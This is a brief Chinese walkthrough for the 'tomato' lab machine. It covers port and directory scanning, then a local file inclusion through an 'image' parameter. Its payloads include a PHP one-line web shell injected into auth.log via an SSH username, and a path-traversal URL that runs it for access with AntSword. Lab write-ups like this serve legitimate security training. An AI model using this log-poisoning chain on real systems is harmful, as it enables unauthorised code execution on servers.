tomato靶机通关攻略

1、扫描靶机端口

2、访问开放的端口，当访问8888是，出现登录界面

3、扫面靶机目录

dirb http://172.16.1.113

4、访问http://172.16.1.113/antibot_image/

5、点击antibots文件夹，可以发现许多文件

再点击info.php

查看页面源代码，可以发现参数为image

6、查看日志文件

7、使用ssh 连接，写入一句话木马

ssh '<?php phpinfo();eval($_POST["cmd"]);?>'@172.16.1.113 -p 2211

8、使用蚁剑进行连接

http://172.16.1.113/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.log